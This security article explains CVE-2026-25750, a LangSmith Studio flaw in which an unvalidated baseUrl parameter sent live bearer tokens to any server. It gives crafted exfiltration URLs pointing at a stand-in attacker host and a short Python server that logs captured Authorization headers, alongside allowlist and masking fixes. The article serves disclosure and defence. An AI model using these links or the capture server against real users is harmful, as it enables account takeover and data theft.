A critical flaw in LangSmith—one of the most widely deployed AI observability platforms in enterprise environments—allowed unauthenticated attackers to steal live session credentials and seize full account control. No fake login page. No typed password. Just a link.
LangSmith, built by LangChain, sits at the center of how enterprises build, test, and monitor large language model (LLM) applications. It handles close to one billion events and tens of terabytes of data every day. The organizations using it are not hobbyists running side projects—they are companies with production AI systems processing customer records, financial data, internal knowledge bases, and proprietary business logic. When researchers at Miggo Security found a way to take over any authenticated LangSmith account with a single crafted URL, it was not a theoretical concern. It was a direct path into the operational core of an organization's AI infrastructure.
The vulnerability, formally tracked as CVE-2026-25750 and assigned a CVSS 4.0 base score of 8.5 (HIGH), was publicly disclosed through a LangChain Security Advisory on January 7, 2026. The underlying flaw had already been patched in cloud deployments by December 15, 2025, and in self-hosted instances by December 20, 2025. No active exploitation was confirmed prior to disclosure, but the attack surface was wide open and the impact of successful exploitation would have been severe.
What LangSmith Is and Why It Is a High-Value Target
LangSmith is the observability and debugging layer for LLM-powered applications built on the LangChain framework and compatible tooling. Developers use it to trace execution flows, inspect inputs and outputs, monitor latency and cost, evaluate model behavior, and debug production incidents. It is the platform that sees everything a deployed AI system does.
That visibility is precisely what makes it dangerous to compromise. A LangSmith account does not simply hold configuration settings. It holds trace data: the raw, unfiltered record of what your AI system received as input, how it processed it, what tools it called, what those tools returned, and what it ultimately sent back to the user. Traces are built for debugging, which means they are designed to capture information in full fidelity. While LangSmith supports masking of specific fields, those controls are optional and inconsistently applied in practice.
In other words, an attacker who gains access to a LangSmith account may be able to read the internal SQL queries your AI agent runs against your database. They may be able to read the CRM records it pulls. They may be able to extract the system prompt—the proprietary instruction set that defines how your AI behaves—which represents the distilled engineering investment of your entire AI product team. This is not a generic data breach. It is a targeted window into an organization's decision-making logic and operational data.
The Vulnerability: URL Parameter Injection via baseUrl
The flaw is classified under CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection), specifically as a URL parameter injection vulnerability. To understand how it works, it helps to first understand the feature it exploits.
LangSmith Studio, the browser-based interface for interacting with the platform, is designed with flexibility in mind. Developers frequently need to run Studio locally or point it at different backend environments—staging, production, self-hosted instances—while still authenticating against their cloud account. To support this, Studio accepts a baseUrl query parameter in the URL. When set, this parameter instructs the frontend to direct all API requests to the specified server rather than the default LangChain backend.
The design is sensible for developer convenience. The security failure was elementary: the application performed no validation on the destination domain. It accepted any value passed via baseUrl and sent authenticated API requests, including live bearer tokens, user IDs, and workspace IDs, directly to that destination. An attacker who could convince an authenticated user to load a URL containing an attacker-controlled baseUrl value would receive those credentials automatically, without any further action from the victim.
The crafted URL for a cloud deployment looked like this:
https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com
For self-hosted deployments, the pattern was identical, substituting the organization's own LangSmith domain:
https://<YOUR_LANGSMITH_DOMAIN>/studio/?baseUrl=https://attacker-server.com
No exploit code. No memory corruption. No authentication bypass in the traditional sense. The application was functioning exactly as designed—it was just designed to trust input it should have rejected.
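The vulnerable pattern can be sketched in a few lines. This is an illustrative reconstruction, not LangSmith's actual frontend code: the function name, the default backend URL, and the parsing details are assumptions made for the example.

```python
from urllib.parse import urlparse, parse_qs

# Illustrative default; the real Studio backend endpoint may differ.
DEFAULT_BACKEND = "https://api.smith.langchain.com"

def resolve_api_base(page_url: str) -> str:
    """Sketch of the vulnerable logic: the query parameter wins unconditionally."""
    params = parse_qs(urlparse(page_url).query)
    # No domain validation: any attacker-supplied origin is accepted verbatim,
    # and all subsequent authenticated API calls are routed to it.
    return params.get("baseUrl", [DEFAULT_BACKEND])[0]

crafted = "https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com"
print(resolve_api_base(crafted))  # -> https://attacker-server.com
```

The single missing step is any check on the parsed hostname before it is trusted as an API origin; everything downstream of that decision behaves correctly, which is why the flaw survived automated scanning.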
Attack Mechanics: How the Exploit Unfolds
The attack requires one precondition: the target must be an authenticated LangSmith user at the time of exploitation. From there, the sequence is straightforward and does not require the victim to take any action beyond visiting a URL or a webpage that loads one automatically.
The attacker first sets up a server under their control configured to log incoming HTTP requests in full, capturing all headers and parameters. They then deliver the crafted LangSmith URL to the target—via a phishing email, a message in a collaboration tool, a compromised website, or hostile JavaScript embedded in any page the victim visits. When the authenticated victim's browser loads the URL, LangSmith Studio initializes as normal and begins making API calls—but it sends those calls, along with the victim's active bearer token, user ID, and workspace ID, directly to the attacker's server rather than to LangChain's backend.
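The attacker-side setup described above amounts to little more than a request logger. A minimal sketch of such a capture server follows; it is hypothetical (real harvesting infrastructure would also need TLS and CORS preflight handling), and the token string is a placeholder standing in for a victim's live bearer token.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

captured = []  # each entry records one incoming authenticated request

class CaptureHandler(BaseHTTPRequestHandler):
    """Logs the path and Authorization header of every request it receives."""
    def do_GET(self):
        captured.append({
            "path": self.path,
            "authorization": self.headers.get("Authorization"),
        })
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # silence default console logging
        pass

# Demo: run the logger locally and simulate the victim's browser, which
# attaches its session credentials to API calls routed to the wrong origin.
server = HTTPServer(("127.0.0.1", 0), CaptureHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

req = urllib.request.Request(
    f"http://127.0.0.1:{server.server_port}/api/v1/sessions",
    headers={"Authorization": "Bearer victim-session-token"},  # placeholder
)
urllib.request.urlopen(req)
server.shutdown()

print(captured[0]["authorization"])  # -> Bearer victim-session-token
```

The point of the sketch is how little the attacker has to build: the victim's own browser does all the work of authenticating and attaching the token.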
This is fundamentally different from traditional credential phishing. In a standard phishing attack, the attacker must replicate a login page convincingly enough that the victim enters their username and password. That attack relies on the victim being deceived into an active choice. CVE-2026-25750 requires no such deception at the credential level. The victim never sees a fake login form. The credentials are transmitted automatically by the victim's own browser, behaving exactly as it was designed to—just pointed at the wrong destination.
"A logged-in LangSmith user could be compromised merely by accessing an attacker-controlled site or by clicking a malicious link." — Liad Eliyahu and Eliana Vuijsje, Miggo Security
Once the attacker receives the session token, the clock starts. The bearer token has a five-minute validity window. Within that window, the attacker can use the token to authenticate to the real LangSmith API and perform any action the victim's account is authorized to take. Depending on the victim's role within their organization, that could mean read access to trace data, administrative access to workspace settings, or the ability to delete projects and alter configurations.
Self-hosted LangSmith administrators who have not yet upgraded to version 0.12.71 (Helm chart langsmith-0.12.33 or later) remain vulnerable. Cloud customers on the LangSmith SaaS platform were protected by December 15, 2025. The self-hosted patch was released December 20, 2025. Verify your deployment version immediately.
What an Attacker Gains
The consequences of a successful account takeover in an AI observability platform are categorically different from those in a standard SaaS application. This is not a case where an attacker steals a profile or accesses a user's stored documents. LangSmith sits downstream of every AI interaction an organization's systems perform, and its trace data reflects that.
Miggo Security's research outlined three primary categories of what a successful attacker can access and do:
- Exfiltrate tool inputs and outputs. AI trace records capture the raw data that flows in and out of every tool call an LLM agent makes. This includes query results from internal databases, API responses from connected services, and any data processed during execution. That data may contain personally identifiable information (PII), protected health information (PHI), financial records, or proprietary business data.
- Steal system prompts. The system prompt is the foundational instruction set that defines how an AI behaves—its persona, its constraints, its access rules, its reasoning priorities. In enterprise AI products, the system prompt represents significant engineering and business investment. Exposure of a system prompt gives a competitor or adversary an immediate understanding of an organization's AI strategy, safety design, and behavioral guardrails.
- Hijack the account. Beyond data exfiltration, the attacker can modify workspace settings, alter project configurations, and delete data. In a production AI operations environment, destructive changes to an observability platform can degrade monitoring capabilities exactly when an organization needs them most.
The research also noted something that tends to be overlooked in discussions of observability platform security: traces are designed to capture everything for debugging purposes, and the masking controls that exist are not always applied. In many real-world deployments, internal SQL queries, CRM customer records, and proprietary source code appear in trace data in plain text because no one specifically configured those fields to be redacted.
"This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails." — Liad Eliyahu and Eliana Vuijsje, Miggo Security
Discovery, Disclosure, and Patching
CVE-2026-25750 was discovered by Miggo Security researchers Liad Eliyahu and Eliana Vuijsje, who published their technical findings on March 12, 2026. The responsible disclosure timeline, however, began months earlier. Miggo disclosed the vulnerability to LangChain on December 1, 2025. LangChain remediated the issue on the SaaS platform by December 15, 2025—two weeks after initial disclosure—and shipped a patch for self-hosted deployments on December 20, 2025. The formal security advisory from LangChain was published on January 7, 2026, at which point the company confirmed no evidence of exploitation in the wild had been observed.
The patching approach itself illustrates an important structural characteristic of SaaS security. Because the vulnerability resided in the hosted platform rather than in a distributed software package, LangChain was able to patch every cloud user simultaneously with a single deployment. No customer action was required. This centralized remediation model is one of the genuine security advantages of SaaS, even though it also means that a single unpatched flaw exposes an entire user base at once.
For self-hosted administrators, the situation is different. The patch exists, but applying it requires deliberate action. Organizations running LangSmith on their own infrastructure must upgrade to version 0.12.71 or Helm chart langsmith-0.12.33 to be protected. Those who have not yet done so remain exposed.
LangChain addressed the issue by implementing domain validation on the baseUrl parameter, ensuring that the frontend will only route API requests to approved destinations rather than accepting arbitrary attacker-supplied values. The fix is straightforward from an implementation standpoint—an allowlist or strict origin check—but the fact that it was absent from a platform processing this volume of sensitive enterprise data reflects a broader gap in how AI tooling vendors approach security review during feature development.
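The class of fix described, validating the requested origin against an allowlist before routing any authenticated request, can be sketched as follows. The allowed hosts and function names are illustrative assumptions, not LangChain's actual implementation.

```python
from urllib.parse import urlparse

# Illustrative allowlist; a real deployment would enumerate its own
# approved backend origins (cloud endpoint, known self-hosted domains).
ALLOWED_HOSTS = {"api.smith.langchain.com", "localhost", "127.0.0.1"}
DEFAULT_BACKEND = "https://api.smith.langchain.com"

def safe_api_base(requested: str) -> str:
    """Accept a baseUrl override only if it targets an approved host."""
    parsed = urlparse(requested)
    if parsed.scheme in ("http", "https") and parsed.hostname in ALLOWED_HOSTS:
        return requested
    # Anything else, including attacker-controlled origins, falls back
    # to the trusted default instead of receiving bearer tokens.
    return DEFAULT_BACKEND
```

Keying the check on the parsed hostname matters: naive substring checks such as `"langchain.com" in url` are trivially bypassed by URLs like `https://attacker-server.com/?x=langchain.com`.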
"LangChain treats LangSmith as security-critical infrastructure and continues to invest in preventative controls, defensive reviews, and responsible disclosure processes to support enterprise use cases." — LangChain Security Advisory, January 7, 2026
The Broader Signal for AI Infrastructure Security
CVE-2026-25750 did not emerge from a novel class of attack technique. URL parameter injection is a well-understood vulnerability type, present in CWE catalogs and security curricula for years. What makes this disclosure significant is not the mechanics of the flaw but where it was found and what it could reach.
The AI tooling ecosystem has expanded at a pace that has consistently outrun its security maturity. Frameworks, observability platforms, agent orchestrators, and model serving infrastructure have been built rapidly, often by teams prioritizing developer experience and deployment speed. Security review of complex application logic—as opposed to dependency scanning or automated SAST—requires time and expertise that many of these projects have not yet invested in. Miggo's researchers specifically noted that the structural gap they identified in LangSmith's business logic was the kind that automated scanners miss. It took human analysis to find it.
This disclosure also arrives alongside a cluster of related findings across the AI infrastructure stack. In the same period, Miggo Security and other researchers disclosed vulnerabilities in SGLang (CVE-2026-3059 and CVE-2026-3060, both rated CVSS 9.8) that allow unauthenticated remote code execution through unsafe pickle deserialization. BeyondTrust disclosed a DNS exfiltration technique against Amazon Bedrock AgentCore's code execution sandbox. The pattern is consistent: AI infrastructure, built for capability, has not yet been hardened for adversarial conditions at the same rate it has been deployed into sensitive environments.
For security teams, the practical implication is that AI observability and orchestration platforms need to be treated with the same scrutiny applied to any other piece of critical infrastructure. Access controls, token management, data sanitization before ingestion into monitoring layers, and regular security review of platform configurations are not optional enhancements. They are baseline requirements for any organization running production AI workloads.
For organizations running self-hosted LangSmith specifically, the remediation steps remain active: upgrade to version 0.12.71, ensure that sensitive data fields are masked before they reach the trace layer, apply least-privilege access controls to workspace users, and audit API key permissions regularly. Multi-factor authentication, where the platform supports it, hardens the login path, though it cannot by itself prevent misuse of an already-issued bearer token intercepted within its validity window.
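The masking recommendation can be illustrated generically. LangSmith ships its own masking configuration; the sketch below is a framework-agnostic illustration of the principle (redact known-sensitive keys before a payload ever reaches the trace layer), with the key names chosen purely for the example.

```python
# Example set of sensitive key names; a real deployment would derive
# this from its own data classification policy.
SENSITIVE_KEYS = {"ssn", "email", "password", "api_key", "credit_card"}

def mask_trace_payload(payload):
    """Recursively redact sensitive keys before a record leaves the application."""
    if isinstance(payload, dict):
        return {
            key: "[REDACTED]" if key.lower() in SENSITIVE_KEYS
            else mask_trace_payload(value)
            for key, value in payload.items()
        }
    if isinstance(payload, list):
        return [mask_trace_payload(item) for item in payload]
    return payload

record = {"query": "SELECT * FROM users", "user": {"email": "a@b.com", "plan": "pro"}}
print(mask_trace_payload(record))
# -> {'query': 'SELECT * FROM users', 'user': {'email': '[REDACTED]', 'plan': 'pro'}}
```

Applying redaction at the application boundary, rather than trusting optional platform-side controls, means a compromised observability account exposes placeholders instead of live customer data.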
Key Takeaways
- The flaw is a URL parameter injection, not a traditional phishing attack. CVE-2026-25750 required no credential entry from victims. A single link caused the victim's browser to automatically transmit live session tokens to an attacker's server, bypassing the need for a fake login page entirely.
- AI observability platforms carry a unique blast radius. Compromise of a LangSmith account exposes not just user data but the operational core of an organization's AI systems: trace histories, internal database query results, system prompts, and the business logic governing AI behavior.
- Cloud users were patched centrally; self-hosted users must act. LangChain deployed a fix to all SaaS users by December 15, 2025. Self-hosted deployments remain unprotected until administrators upgrade to LangSmith version 0.12.71 or Helm chart langsmith-0.12.33 or later.
- Automated scanners missed this. Miggo's researchers found the vulnerability through manual analysis of application logic. Security teams cannot rely solely on automated tooling to identify structural flaws in complex AI platform behavior.
- AI infrastructure is now a primary attack surface. This disclosure is part of a pattern. SGLang, Amazon Bedrock, and LangSmith all surfaced significant vulnerabilities within the same disclosure window. Organizations deploying AI tooling at scale need dedicated security review processes for that tooling, not assumptions that developer-facing platforms are lower-risk.
The architecture of modern AI systems creates new attack surfaces that security teams are still learning to map. LangSmith sits at the intersection of application logic and sensitive data by design—that intersection is precisely why it is useful, and precisely why compromising it carries consequences that extend well beyond a standard account breach. CVE-2026-25750 is a textbook case of a developer convenience feature becoming an attacker's entry point, and it will not be the last one found in the AI observability space.
Sources
- Miggo Security — Hack the AI Brain: Uncovering an Account Takeover Vulnerability in LangSmith (March 12, 2026)
- LangChain — LangSmith Security Advisory (January 7, 2026)
- GitHub Security Advisory — GHSA-r8wq-jwgw-p7: LangSmith Studio URL Parameter Injection
- Vulnerability-Lookup / CIRCL — CVE-2026-25750 Entry
- The Hacker News — AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE (March 17, 2026)
- Cyber Security News — Critical LangSmith Account Takeover Vulnerability Puts Users at Risk (March 14, 2026)